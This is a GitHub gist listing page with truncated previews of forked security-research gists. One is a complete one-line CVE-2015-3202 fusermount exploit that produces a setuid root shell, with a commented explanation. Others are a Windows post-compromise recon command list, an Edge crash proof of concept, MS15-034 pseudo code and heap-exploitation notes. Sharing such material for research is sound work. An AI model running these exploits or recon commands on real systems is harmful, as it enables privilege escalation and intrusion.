- Disclamair
- House Of Roman
------> 2.1 Assumptions
------> 2.2 Protections
------> 2.3 Quick Walkthrough
------> 2.4 Setting the FD to malloc_hook
------> 2.5 Fixing the 0x71 freelist
------> 2.6 Unsorted Bin attack on malloc_hook
@ith4cker ITh4cker
ITh4cker
/ converter.sh
Created
June 11, 2018 05:38
— forked from xdavidhu/converter.sh
Converter.sh, a bash script to convert domain lists to resolved IP lists without duplicates
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Converter.sh by @xdavidhu | |
| # This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix | |
| # With this script, you can convert domain lists to resolved IP lists without duplicates. | |
| # Usage: ./converter.sh [domain-list-file] [output-file] | |
| echo -e "[+] Converter.sh by @xdavidhu\n" | |
| if [ -z "$1" ] || [ -z "$2" ]; then | |
| echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]" | |
| exit 1 |
ITh4cker
/ House_of_Roman.md
Created
May 2, 2018 01:32
— forked from romanking98/House_of_Roman.md
ITh4cker
/ http_sys_pseudo.c
Created
December 18, 2015 15:32
— forked from worawit/http_sys_pseudo.c
MS15-034 (CVE-2015-1635) PoCs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Pseudo code in HTTP.sys to understand flow related to MS15-034 | |
| All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86 | |
| For anyone want to know what function are patched. | |
| Just open patched version and find all functions reference to RtlULongLongAdd(). | |
| */ | |
ITh4cker
/ CVE-2015-3202
Created
December 18, 2015 15:25
— forked from taviso/CVE-2015-3202
Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. | |
| 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 | |
| a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 | |
| # Here's how it works, $a holds the name of a shellscript to be executed as | |
| # root. | |
| a=/tmp/.$$; | |
| # $b is used twice, first to build the contents of shellscript $a, and then as |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Author: Casey Smith @subTee | |
| ipconfig /all>> C:\Tools\Debug\1.txt | |
| tasklist /v >> C:\Tools\Debug\1.txt | |
| net user >>C:\Tools\Debug\1.txt | |
| net localgroup administrators>>C:\Tools\Debug\1.txt | |
| netstat -ano >> C:\Tools\Debug\1.txt | |
| net use >> C:\Tools\Debug\1.txt | |
| net view >> C:\Tools\Debug\1.txt | |
| net view /domain >> C:\Tools\Debug\1.txt |
ITh4cker
/ edge_crash.html
Created
December 12, 2015 09:51
— forked from h0wl/edge_crash.html
Microsoft Edge Crash
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- based on https://connect.microsoft.com/IE/feedback/details/1683347/ms-edge-combination-of-iframe-anchor-hash-navigation-and-history-state-crashes-the-browse --> | |
| <!doctype html> | |
| <html> | |
| <head> | |
| <script> | |
| function boom() { | |
| var iframe = document.getElementById('iframe1'); | |
| document.location.href = '#'; | |
| iframe.parentNode.removeChild(iframe); | |
| alert(history.state); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
ITh4cker
/ build.bat
Created
November 28, 2015 13:53
— forked from mattifestation/build.bat
Module Initializer PoC - Run build.bat from current dir in Visual Studio Command Prompt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| csc test.cs | |
| ildasm /OUT=test.il test.exe | |
| type moduleinititalizer.il >> test.il | |
| ilasm /EXE /OUTPUT=test.exe test.il |